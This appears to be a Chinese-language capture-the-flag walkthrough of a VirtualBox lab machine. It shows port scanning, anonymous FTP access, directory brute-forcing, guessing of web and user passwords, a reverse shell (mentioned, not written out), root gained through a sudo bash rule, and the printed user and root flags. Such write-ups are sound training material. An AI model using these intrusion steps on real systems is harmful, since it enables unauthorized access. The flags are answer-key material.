怀旧系列 也算是一种复刻?
bash
$ nmap -p- 192.168.31.170 --min-rate 5000 -oN nmapscan/ports
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-22 03:52 EST
Nmap scan report for Yibasuo (192.168.31.170)
Host is up (0.00088s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
6200/tcp filtered lm-x
MAC Address: 08:00:27:64:B0:CC (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
$ nmap -sVC -O -p 21,22,80 192.168.31.170 -oN nmapscan/nmap_tcp
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-22 03:52 EST
Nmap scan report for Yibasuo (192.168.31.170)
Host is up (0.00053s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.31.187
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 14 Jun 17 13:41 creds.txt
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Linux\xE9\x9D\xB6\xE6\x9C\xBA\xE5\x85\xA5\xE5\x8F\xA3
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:64:B0:CC (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.01 secondsbash
$ lftp 192.168.31.170 -u anonymous
密码:
lftp anonymous@192.168.31.170:/> ls -la
drwxr-xr-x 2 0 0 4096 Jun 17 13:41 .
drwxr-xr-x 2 0 0 4096 Jun 17 13:41 ..
-rw-r--r-- 1 0 0 14 Jun 17 13:41 creds.txt
lftp anonymous@192.168.31.170:/> cat creds.txt
root:fakepass
14 bytes transferred没啥玩意
bash
$ feroxbuster -u 'http://192.168.31.170/' -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --random-agent -x php,html,txt -C 404,502 -q
404 GET 9l 31w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 149l 300w 4087c http://192.168.31.170/
200 GET 149l 300w 4087c http://192.168.31.170/index.php
301 GET 9l 28w 317c http://192.168.31.170/secure => http://192.168.31.170/secure/
200 GET 1022l 5284w 85928c http://192.168.31.170/info.php
302 GET 0l 0w 0c http://192.168.31.170/secure/index.php => http://192.168.31.170/
302 GET 0l 0w 0c http://192.168.31.170/secure/logout.php => http://192.168.31.170/先看看 info.php
就是 phpinfo
没有 disable_functions
有个 用户名 webmaster
爆破一下就出来了
admin:password123
进去了是一个管理系统
能 busybox
弹回来一个 shell
bash
www-data@Yibasuo:/var/www/html/secure$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Yibasuo:/home/todd$ cat user.txt
flag{user-43109792-4b81-11f0-a435-9731ae49dbea}跑个 linpeas.sh
没啥发现
todd 有弱密码 随便搞个弱密码生成程序
bash
www-data@Yibasuo:/tmp$ su todd
Password: todd123!@#
todd@Yibasuo:/tmp$ cd
todd@Yibasuo:~$ ls
user.txt
todd@Yibasuo:~$ sudo -l
Matching Defaults entries for todd on Yibasuo:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User todd may run the following commands on Yibasuo:
(ALL) NOPASSWD: /usr/bin/bash
todd@Yibasuo:~$ sudo bash
root@Yibasuo:/home/todd# cd
root@Yibasuo:~# ls
root.txt
root@Yibasuo:~# cat root.txt
flag{root-15d4d3ec-4b81-11f0-9da9-b378f7bb3e40}